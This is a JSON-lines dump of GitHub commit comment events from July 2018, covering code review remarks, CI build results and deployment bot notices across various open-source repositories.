{"id":"8024276875","type":"CommitCommentEvent","actor":{"login":"git-jano"},"repo":{"name":"vacuumlabs/cardanolite"},"payload":{"comment":{"id":29847737,"position":23,"line":369,"path":"app/frontend/actions.js","commit_id":"0cfc943e9bb2e073e425c2f7a0fd7a49cf5ad336","created_at":"2018-07-26T17:55:43Z","updated_at":"2018-07-26T17:55:43Z","author_association":"CONTRIBUTOR","body":"120 000  *  5s = week ! "}},"created_at":"2018-07-26T17:55:43Z"}
{"id":"8024280479","type":"CommitCommentEvent","actor":{"login":"hawkw"},"repo":{"name":"sos-os/alarm"},"payload":{"comment":{"id":29847748,"position":15,"line":15,"path":"alarm-test/src/lib.rs","commit_id":"e1d03333e262c88c2abb59e6886dd20e007dea40","created_at":"2018-07-26T17:56:25Z","updated_at":"2018-07-26T17:56:25Z","author_association":"MEMBER","body":"This is going to need to be a `usize` --- since we're getting the address values from pointers to objects, it needs to be the same width as a pointer on the machine we're running on. Otherwise we'll have all kinds of fun truncation problems. \r\n\r\nNote that, in particular, a one-byte pointer (i.e. a `u8`) can only address 255 words of memory.  This is gonna be a problem, since if you're running on a 64-bit machine (or even a 32- or 16-bit one), and you create a new `MockFrame`, the allocator is almost certainly going to place it in a memory location _much_ higher than 0xFF --- then heap is usually in high-number memory. "}},"created_at":"2018-07-26T17:56:25Z"}
{"id":"8024282073","type":"CommitCommentEvent","actor":{"login":"LawrenceLin690"},"repo":{"name":"JTLL/GraceStarShopper"},"payload":{"comment":{"id":29847750,"position":null,"line":null,"path":null,"commit_id":"1bdeec350e865c17d1809f9bd55d10bfbbf3c881","created_at":"2018-07-26T17:56:43Z","updated_at":"2018-07-26T17:56:43Z","author_association":"CONTRIBUTOR","body":"added comma"}},"created_at":"2018-07-26T17:56:43Z"}
{"id":"8024285023","type":"CommitCommentEvent","actor":{"login":"hawkw"},"repo":{"name":"sos-os/alarm"},"payload":{"comment":{"id":29847756,"position":44,"line":44,"path":"alarm-test/src/lib.rs","commit_id":"e1d03333e262c88c2abb59e6886dd20e007dea40","created_at":"2018-07-26T17:57:19Z","updated_at":"2018-07-26T17:57:19Z","author_association":"MEMBER","body":" We want the _value_ of `number`, not the address of a pointer to it. This can just return `self.number`."}},"created_at":"2018-07-26T17:57:19Z"}
{"id":"8024285296","type":"CommitCommentEvent","actor":{"login":"darthvoider"},"repo":{"name":"darthvoider/test"},"payload":{"comment":{"id":29847758,"position":4,"line":10,"path":"site/index.html","commit_id":"228ec9aaa0f754c52a93c7b606a8fe85b2acb001","created_at":"2018-07-26T17:57:22Z","updated_at":"2018-07-26T17:57:22Z","author_association":"OWNER","body":"bad code\r\n"}},"created_at":"2018-07-26T17:57:22Z"}
{"id":"8024291300","type":"CommitCommentEvent","actor":{"login":"saljuama"},"repo":{"name":"saljuama/java-8-vavr-functional"},"payload":{"comment":{"id":29847773,"position":70,"line":70,"path":"src/test/java/com/saljuama/javafunctional/highorderfunctions/adts/sum/OptionHighOrderApiTest.java","commit_id":"b96d69719b227ac1552df006abcdf295728055a2","created_at":"2018-07-26T17:58:32Z","updated_at":"2018-07-26T17:58:32Z","author_association":"OWNER","body":"just inlining the variables inside the collect functions, type inference kicks in\r\nI have extracted it to highlight what is going on behind the scenes"}},"created_at":"2018-07-26T17:58:32Z"}
{"id":"8024293374","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29847780,"position":null,"line":null,"path":null,"commit_id":"657158bc7fee9fa85f7738fb68e87daa00f6763f","created_at":"2018-07-26T17:58:57Z","updated_at":"2018-07-26T17:58:57Z","author_association":"OWNER","body":"Yes, tested on several models"}},"created_at":"2018-07-26T17:58:57Z"}
{"id":"8024297499","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29847793,"position":null,"line":null,"path":null,"commit_id":"98e3762e25f46d7cbe77546843ff3ec3fd221f0c","created_at":"2018-07-26T17:59:47Z","updated_at":"2018-07-26T17:59:47Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-968](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-968).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-968-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T17:59:47Z"}
{"id":"8024302368","type":"CommitCommentEvent","actor":{"login":"denfreeQ789"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29847811,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-26T18:00:43Z","updated_at":"2018-07-26T18:00:43Z","author_association":"NONE","body":"Cool project!!!"}},"created_at":"2018-07-26T18:00:43Z"}
{"id":"8024303546","type":"CommitCommentEvent","actor":{"login":"theycallmeljefe"},"repo":{"name":"theycallmeljefe/Bitcoin_Mining"},"payload":{"comment":{"id":29847816,"position":null,"line":null,"path":null,"commit_id":"b6afbbfd478023ba0bb8e83a83cfe550e35cebef","created_at":"2018-07-26T18:00:56Z","updated_at":"2018-07-26T18:00:56Z","author_association":"OWNER","body":"I think we can throw GBT, getwork, get memerypool... (BIPs 22/23) under \"History of mining.\""}},"created_at":"2018-07-26T18:00:56Z"}
{"id":"8024308128","type":"CommitCommentEvent","actor":{"login":"ki-foobar"},"repo":{"name":"ElonaFoobar/ElonaFoobar"},"payload":{"comment":{"id":29847826,"position":null,"line":null,"path":null,"commit_id":"ecf26c1726f559c3f0979b7e957a68ee99a3b04d","created_at":"2018-07-26T18:01:45Z","updated_at":"2018-07-26T18:01:45Z","author_association":"CONTRIBUTOR","body":"@Ruin0x11 \r\nDon't commit to `develop` branch directly, please. It is because I write changelog referring to list of issues and pull requests."}},"created_at":"2018-07-26T18:01:45Z"}
{"id":"8024310242","type":"CommitCommentEvent","actor":{"login":"kimobrian"},"repo":{"name":"mdehoog/ember-data-has-many-query"},"payload":{"comment":{"id":29847832,"position":41,"line":100,"path":"addon/mixins/model.js","commit_id":"3ca3dd1571e555c5135970dbb92b6f78aa7c3f9e","created_at":"2018-07-26T18:02:11Z","updated_at":"2018-07-26T18:02:11Z","author_association":"NONE","body":"@mdehoog This should be `if (isLoaded || forceReload) {`"}},"created_at":"2018-07-26T18:02:11Z"}
{"id":"8024310433","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29847833,"position":null,"line":null,"path":null,"commit_id":"bf1e27e2cb2daa10d07460cb1447ed8ce2761c2e","created_at":"2018-07-26T18:02:13Z","updated_at":"2018-07-26T18:02:13Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2323 of 2323 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf1e27e2cb2daa10d07460cb1447ed8ce2761c2e-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf1e27e2cb2daa10d07460cb1447ed8ce2761c2e-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T18:02:13Z"}
{"id":"8024314339","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29847840,"position":null,"line":null,"path":null,"commit_id":"5f9a174b2a4ad8553db1ee412b6a7cab7b9b1d21","created_at":"2018-07-26T18:02:58Z","updated_at":"2018-07-26T18:02:58Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/changelog/2018/07](https://3727change-static-docs.pantheonsite.io/docs/changelog/2018/07)\n"}},"created_at":"2018-07-26T18:02:58Z"}
{"id":"8024318154","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29847848,"position":null,"line":null,"path":null,"commit_id":"292ca30b69325b2ad5a56869b5cabfb69b96aae5","created_at":"2018-07-26T18:03:43Z","updated_at":"2018-07-26T18:03:43Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-158](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-158).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-158-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T18:03:43Z"}
{"id":"8024319814","type":"CommitCommentEvent","actor":{"login":"ihnorton"},"repo":{"name":"Slicer/SlicerJupyter"},"payload":{"comment":{"id":29847852,"position":null,"line":null,"path":null,"commit_id":"d54771c0aa81fb10cc6d079dc23c3e86764e5032","created_at":"2018-07-26T18:04:03Z","updated_at":"2018-07-26T18:04:03Z","author_association":"MEMBER","body":"This is kind of confusing. Should at least print a message that the Slicer window has been minimized."}},"created_at":"2018-07-26T18:04:03Z"}
{"id":"8024321554","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29847854,"position":null,"line":null,"path":null,"commit_id":"f76c6f42a3c0b9be345859545bd37bf5df9be20d","created_at":"2018-07-26T18:04:24Z","updated_at":"2018-07-26T18:04:24Z","author_association":"NONE","body":"Test stopped. Please use sprt."}},"created_at":"2018-07-26T18:04:24Z"}
{"id":"8024322327","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29847856,"position":null,"line":null,"path":null,"commit_id":"c16491194535f1d85ec2beca94adaa54876c83df","created_at":"2018-07-26T18:04:33Z","updated_at":"2018-07-26T18:04:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-154](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-154).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-154-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T18:04:33Z"}
{"id":"8024323863","type":"CommitCommentEvent","actor":{"login":"proteus88"},"repo":{"name":"pfsense/FreeBSD-ports"},"payload":{"comment":{"id":29847860,"position":null,"line":null,"path":null,"commit_id":"7c2caf5a2b8f4169832e30d03ab8987198f86bda","created_at":"2018-07-26T18:04:51Z","updated_at":"2018-07-26T18:04:51Z","author_association":"NONE","body":"Same problem, SNI not working, is there a workaround ?"}},"created_at":"2018-07-26T18:04:51Z"}
{"id":"8024325040","type":"CommitCommentEvent","actor":{"login":"saljuama"},"repo":{"name":"saljuama/java-8-vavr-functional"},"payload":{"comment":{"id":29847863,"position":92,"line":92,"path":"src/test/java/com/saljuama/javafunctional/highorderfunctions/adts/sum/TryHighOrderApiTest.java","commit_id":"b96d69719b227ac1552df006abcdf295728055a2","created_at":"2018-07-26T18:05:07Z","updated_at":"2018-07-26T18:05:07Z","author_association":"OWNER","body":"`simulateWork` is a function that returns void (line 80), also, `peek` function takes a `Consumer` as parameter, which is a function that returns no parameter, but behind the scenes, peek returns the input as output. \r\nUnless you mutate the input inside `peek`, `forEach` will receive exactly `failedStringyNumber`.\r\nIf you want to transform the input, then use `map`, not `peek` :) "}},"created_at":"2018-07-26T18:05:07Z"}
{"id":"8024325968","type":"CommitCommentEvent","actor":{"login":"voiceinthedark"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29847865,"position":49,"line":91,"path":"app/src/main/java/com/example/android/pets/CatalogActivity.java","commit_id":"92fa8aea897c14d3f22e50530e30191e27ece086","created_at":"2018-07-26T18:05:18Z","updated_at":"2018-07-26T18:05:18Z","author_association":"NONE","body":"Turns out getReadableDatabase() returns the same object as getWritableDatabase() !\r\n\r\n> Create and/or open a database. **This will be the same object returned by getWritableDatabase()** unless some problem, such as a full disk, requires the database to be opened read-only. In that case, a read-only database object will be returned. If the problem is fixed, a future call to getWritableDatabase() may succeed, in which case the read-only database object will be closed and the read/write object will be returned in the future. \r\n\r\n[getReadableDatabase](https://developer.android.com/reference/android/database/sqlite/SQLiteOpenHelper.html#getReadableDatabase())"}},"created_at":"2018-07-26T18:05:18Z"}
{"id":"8024328577","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29847871,"position":null,"line":null,"path":null,"commit_id":"0fd49d401ed5391365b095c5b6af16790662cb1c","created_at":"2018-07-26T18:05:50Z","updated_at":"2018-07-26T18:05:50Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-414](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-414).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-414-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-26T18:05:50Z"}
{"id":"8024332871","type":"CommitCommentEvent","actor":{"login":"hramos"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29847878,"position":null,"line":null,"path":null,"commit_id":"52a55fd8d106a15c72671475115c2ebe1f3ee57e","created_at":"2018-07-26T18:06:42Z","updated_at":"2018-07-26T18:06:42Z","author_association":"CONTRIBUTOR","body":"These are commits generated by an automated i18n job that runs on our internal source control. This file, and all other files touched by this job, were just added to the repo this week. The job detected the new `strings.xml` files and it did what it's supposed to.\r\n\r\nWe do need to look into whether we should have `strings.xml` files for all of these locales, however. We're looking into it."}},"created_at":"2018-07-26T18:06:42Z"}
{"id":"8024333416","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29847880,"position":null,"line":null,"path":null,"commit_id":"5e2881d79eb2d44401a0467fccf33c7d8bf45982","created_at":"2018-07-26T18:06:49Z","updated_at":"2018-07-26T18:06:49Z","author_association":"OWNER","body":"Major one was creating a vertex attribute for color *always* (and creating useless data for it ofc wasting buffer space). And that's most of the diff. Also some minor bug with indexing somewhere, but can't see it now.\r\nSorry, next time I'll make some changes log"}},"created_at":"2018-07-26T18:06:49Z"}
{"id":"8024333643","type":"CommitCommentEvent","actor":{"login":"SvetlanaTs"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29847881,"position":7,"line":15,"path":"HowMuch/Code/Presentation/AddGroup/Cells/AddButtonCell/AddButtonCell.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T18:06:52Z","updated_at":"2018-07-26T18:06:52Z","author_association":"OWNER","body":"Да, хорошо. А этот аутлет здесь уже и не нужен."}},"created_at":"2018-07-26T18:06:52Z"}
{"id":"8024335429","type":"CommitCommentEvent","actor":{"login":"nehaljwani"},"repo":{"name":"AnacondaRecipes/gobject-introspection-feedstock"},"payload":{"comment":{"id":29847884,"position":null,"line":null,"path":null,"commit_id":"51f2dc9e16e11f45cab6c7a803adc63e7951053e","created_at":"2018-07-26T18:07:12Z","updated_at":"2018-07-26T18:07:12Z","author_association":"MEMBER","body":"Tried building https://github.com/AnacondaRecipes/gstreamer-feedstock , definitely breaks because of this change. Maybe I am doing something wrong?\r\n\r\n```\r\nCCLD     libgstreamer-1.0.la\r\nmake[3]: *** No rule to make target 'python', needed by 'Gst-1.0.gir'.  Stop.\r\nmake[3]: Leaving directory '/tmp/build/80754af9/gstreamer_and_plugins_1532627643540/work/gst'\r\nmake[2]: *** [Makefile:1728: install-recursive] Error 1\r\nmake[2]: Leaving directory '/tmp/build/80754af9/gstreamer_and_plugins_1532627643540/work/gst'\r\nmake[1]: *** [Makefile:1885: install] Error 2\t\r\nmake[1]: Leaving directory '/tmp/build/80754af9/gstreamer_and_plugins_1532627643540/work/gst'\r\nmake: *** [Makefile:761: install-recursive] Error 1\r\n```"}},"created_at":"2018-07-26T18:07:12Z"}
{"id":"8024335873","type":"CommitCommentEvent","actor":{"login":"jwitko"},"repo":{"name":"dariko/ansible"},"payload":{"comment":{"id":29847887,"position":null,"line":null,"path":null,"commit_id":"23b7d9ac0de27fef7c93a208120a3a98b390db45","created_at":"2018-07-26T18:07:18Z","updated_at":"2018-07-26T18:07:18Z","author_association":"NONE","body":"@dariko hey, commenting here because I didn't want to disrupt the ansible pull request thread (although it seems to be impossible to get this module actually merged).  I have two questions:\r\n1) In its current state for me on docker 18.03-ce, the memory limits and reserved memory options do not seem to be functioning.  Does this also seem true for you?\r\n2) This module does not currently handle deploying to an active service gracefully.  I'm having a hard time understanding the approach it takes, for example if i have a cluster of webservers and change the image tag to a new version and re-run the ansible play, the docker service is wiped and started fresh all at once, causing the service to drop traffic.  Any thoughts on this?"}},"created_at":"2018-07-26T18:07:18Z"}
{"id":"8024339754","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29847895,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-26T18:08:06Z","updated_at":"2018-07-26T18:08:06Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2324 of 2324 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T18:08:06Z"}
{"id":"8024341422","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29847897,"position":null,"line":null,"path":null,"commit_id":"5e2881d79eb2d44401a0467fccf33c7d8bf45982","created_at":"2018-07-26T18:08:24Z","updated_at":"2018-07-26T18:08:24Z","author_association":"NONE","body":"ok but what issue does it solve?"}},"created_at":"2018-07-26T18:08:24Z"}
{"id":"8024344088","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29847901,"position":null,"line":null,"path":null,"commit_id":"657158bc7fee9fa85f7738fb68e87daa00f6763f","created_at":"2018-07-26T18:08:56Z","updated_at":"2018-07-26T18:08:56Z","author_association":"NONE","body":"ok cool, might speed up baw 3d printer file generation"}},"created_at":"2018-07-26T18:08:56Z"}
{"id":"8024345112","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29847903,"position":null,"line":null,"path":null,"commit_id":"5f9a174b2a4ad8553db1ee412b6a7cab7b9b1d21","created_at":"2018-07-26T18:09:10Z","updated_at":"2018-07-26T18:09:10Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/changelog/2018/07](https://3727change-static-docs.pantheonsite.io/docs/changelog/2018/07)\n"}},"created_at":"2018-07-26T18:09:10Z"}
{"id":"8024345483","type":"CommitCommentEvent","actor":{"login":"senier"},"repo":{"name":"jklmnn/genode"},"payload":{"comment":{"id":29847904,"position":null,"line":null,"path":null,"commit_id":"2bf59f6e7b62d12dda0e8e64f3c5a6a1edc85cc9","created_at":"2018-07-26T18:09:14Z","updated_at":"2018-07-26T18:09:14Z","author_association":"COLLABORATOR","body":"Consider changing the copyright *year* to 2018."}},"created_at":"2018-07-26T18:09:14Z"}
{"id":"8024347029","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29847908,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-26T18:09:31Z","updated_at":"2018-07-26T18:09:31Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-26T18:09:31Z"}
{"id":"8024350756","type":"CommitCommentEvent","actor":{"login":"AsciiWolf"},"repo":{"name":"flathub/de.wolfvollprecht.UberWriter"},"payload":{"comment":{"id":29847923,"position":5,"line":4,"path":"de.wolfvollprecht.UberWriter.json","commit_id":"6e777f84567a563a56386fd722505ce1a68f0c7c","created_at":"2018-07-26T18:10:18Z","updated_at":"2018-07-26T18:10:18Z","author_association":"NONE","body":"Why switching to an older runtime?"}},"created_at":"2018-07-26T18:10:18Z"}
{"id":"8024353389","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29847929,"position":44,"line":44,"path":"src/pocketmine/form/FormIcon.php","commit_id":"e542b3732a8694d7581f106e217f3deaf19a33ec","created_at":"2018-07-26T18:10:49Z","updated_at":"2018-07-26T18:10:49Z","author_association":"MEMBER","body":"This is a rebased commit from October 2017. Excuse me if it's outdated."}},"created_at":"2018-07-26T18:10:49Z"}
{"id":"8024363895","type":"CommitCommentEvent","actor":{"login":"JackGoldsworth"},"repo":{"name":"JackGoldsworth/Vision"},"payload":{"comment":{"id":29847956,"position":null,"line":null,"path":null,"commit_id":"1392b968c18859184831d44a638fbe74ac9b85fb","created_at":"2018-07-26T18:12:50Z","updated_at":"2018-07-26T18:12:50Z","author_association":"OWNER","body":"Time to change the secret lmfao"}},"created_at":"2018-07-26T18:12:50Z"}
{"id":"8024363982","type":"CommitCommentEvent","actor":{"login":"JNSchwartz"},"repo":{"name":"PandarinDev/VulcanDojo"},"payload":{"comment":{"id":29847957,"position":30,"line":29,"path":"LegendsOfCodeAndMagic/src/CCGBot.cs","commit_id":"c9c67b42689b04e27011c82f43b68c553edba427","created_at":"2018-07-26T18:12:51Z","updated_at":"2018-07-26T18:12:51Z","author_association":"COLLABORATOR","body":"preferring not too expensive cards was an implementation of hearthstone best practice, but it didn't worked that well"}},"created_at":"2018-07-26T18:12:51Z"}
{"id":"8024365076","type":"CommitCommentEvent","actor":{"login":"Ruin0x11"},"repo":{"name":"ElonaFoobar/ElonaFoobar"},"payload":{"comment":{"id":29847959,"position":null,"line":null,"path":null,"commit_id":"ecf26c1726f559c3f0979b7e957a68ee99a3b04d","created_at":"2018-07-26T18:13:05Z","updated_at":"2018-07-26T18:13:05Z","author_association":"CONTRIBUTOR","body":"Sorry about that, I'll open a PR for each change for now on."}},"created_at":"2018-07-26T18:13:05Z"}
{"id":"8024367842","type":"CommitCommentEvent","actor":{"login":"SvetlanaTs"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29847966,"position":18,"line":48,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/GroupListViewController.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T18:13:37Z","updated_at":"2018-07-26T18:13:37Z","author_association":"OWNER","body":"Пробовала форматировать, Xcode не отреагировал. Хотя, наверно, и не должен был.\r\nПонятно, лучше в таких ситуациях поправить."}},"created_at":"2018-07-26T18:13:37Z"}
{"id":"8024369554","type":"CommitCommentEvent","actor":{"login":"koalasbruder"},"repo":{"name":"koalasbruder/Projects"},"payload":{"comment":{"id":29847972,"position":null,"line":null,"path":null,"commit_id":"c65dabb35f2de7d2a9626ef0cd01437df0594613","created_at":"2018-07-26T18:13:57Z","updated_at":"2018-07-26T18:13:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[Processing] ImageShower](https://trello.com/c/7ZugWyTx/1-processing-imageshower)"}},"created_at":"2018-07-26T18:13:57Z"}
{"id":"8024371016","type":"CommitCommentEvent","actor":{"login":"SvetlanaTs"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29847974,"position":5,"line":12,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/PurchaseListViewController.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T18:14:14Z","updated_at":"2018-07-26T18:14:14Z","author_association":"OWNER","body":"Проще :)"}},"created_at":"2018-07-26T18:14:14Z"}
{"id":"8024372506","type":"CommitCommentEvent","actor":{"login":"koalasbruder"},"repo":{"name":"koalasbruder/Projects"},"payload":{"comment":{"id":29847976,"position":null,"line":null,"path":null,"commit_id":"5d1b6412d04f64f87089e7a687f412b6f2a42624","created_at":"2018-07-26T18:14:32Z","updated_at":"2018-07-26T18:14:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[p5.js] Circles/More Circles](https://trello.com/c/fYiYHawa/2-p5js-circles-more-circles)"}},"created_at":"2018-07-26T18:14:32Z"}
{"id":"8024372681","type":"CommitCommentEvent","actor":{"login":"SvetlanaTs"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29847977,"position":47,"line":50,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/PurchaseListViewController.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T18:14:34Z","updated_at":"2018-07-26T18:14:34Z","author_association":"OWNER","body":"Да, хорошо. Поправлю. А почему с делегатами сложнее? Создавать дольше и не такие наглядные?"}},"created_at":"2018-07-26T18:14:34Z"}
{"id":"8024376301","type":"CommitCommentEvent","actor":{"login":"samth"},"repo":{"name":"pycket/pycket"},"payload":{"comment":{"id":29847986,"position":15,"line":1221,"path":"pycket/values.py","commit_id":"e4b7a2f9676077ec667e9e96abcf72c46ee842e7","created_at":"2018-07-26T18:15:18Z","updated_at":"2018-07-26T18:15:18Z","author_association":"COLLABORATOR","body":"There are a bunch of other things that should be tested, such as: the empty symbol, or `\"`, or `'` or newlines or ..."}},"created_at":"2018-07-26T18:15:18Z"}
{"id":"8024376552","type":"CommitCommentEvent","actor":{"login":"baerkins"},"repo":{"name":"bluecadet/greene-space"},"payload":{"comment":{"id":29847989,"position":null,"line":null,"path":null,"commit_id":"4e1437e93d9bd6aa8c9c00a85d29108476bd00f3","created_at":"2018-07-26T18:15:21Z","updated_at":"2018-07-26T18:15:21Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-greene-space.pantheonsite.io/)\n\nCreated multidev environment [pr-1](https://dashboard.pantheon.io/sites/1ffe8818-30b8-4947-851f-e8a90715b486#pr-1) for greene-space."}},"created_at":"2018-07-26T18:15:21Z"}
{"id":"8024376783","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29847991,"position":null,"line":null,"path":null,"commit_id":"0fd49d401ed5391365b095c5b6af16790662cb1c","created_at":"2018-07-26T18:15:23Z","updated_at":"2018-07-26T18:15:23Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-416](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-416).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-416-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-26T18:15:23Z"}
{"id":"8024378955","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29847993,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-26T18:15:48Z","updated_at":"2018-07-26T18:15:48Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-26T18:15:48Z"}
{"id":"8024384752","type":"CommitCommentEvent","actor":{"login":"cderici"},"repo":{"name":"pycket/pycket"},"payload":{"comment":{"id":29848000,"position":15,"line":1221,"path":"pycket/values.py","commit_id":"e4b7a2f9676077ec667e9e96abcf72c46ee842e7","created_at":"2018-07-26T18:16:56Z","updated_at":"2018-07-26T18:16:56Z","author_association":"COLLABORATOR","body":"I totally agree"}},"created_at":"2018-07-26T18:16:56Z"}
{"id":"8024389576","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"whatwg/xhr"},"payload":{"comment":{"id":29848015,"position":86,"line":2402,"path":"Overview.html","commit_id":"972797fb12106ca00292b9a2e2cb91d8766c4640","created_at":"2018-07-26T18:17:54Z","updated_at":"2018-07-26T18:17:54Z","author_association":"NONE","body":"Shouldn't _completed_ be _succeeded_ instead?\r\nThe typo probably originates from https://github.com/whatwg/xhr/commit/972797fb12106ca00292b9a2e2cb91d8766c4640#diff-1feda49b40370635faef8b655f144f64L2397\r\n\r\n- it shouldn't timeout after onload\r\n- completed correspond to loadend\r\n- succeeded correspond to load"}},"created_at":"2018-07-26T18:17:54Z"}
{"id":"8024389623","type":"CommitCommentEvent","actor":{"login":"rzulian"},"repo":{"name":"donkeytech/gaia-engine"},"payload":{"comment":{"id":29848016,"position":5,"line":62,"path":"src/player.ts","commit_id":"4b873b243160890721685ce40cf4749e6a9d962e","created_at":"2018-07-26T18:17:54Z","updated_at":"2018-07-26T18:17:54Z","author_association":"COLLABORATOR","body":"Is this counting also Lantid's mine on an opponent's colonized planet?"}},"created_at":"2018-07-26T18:17:54Z"}
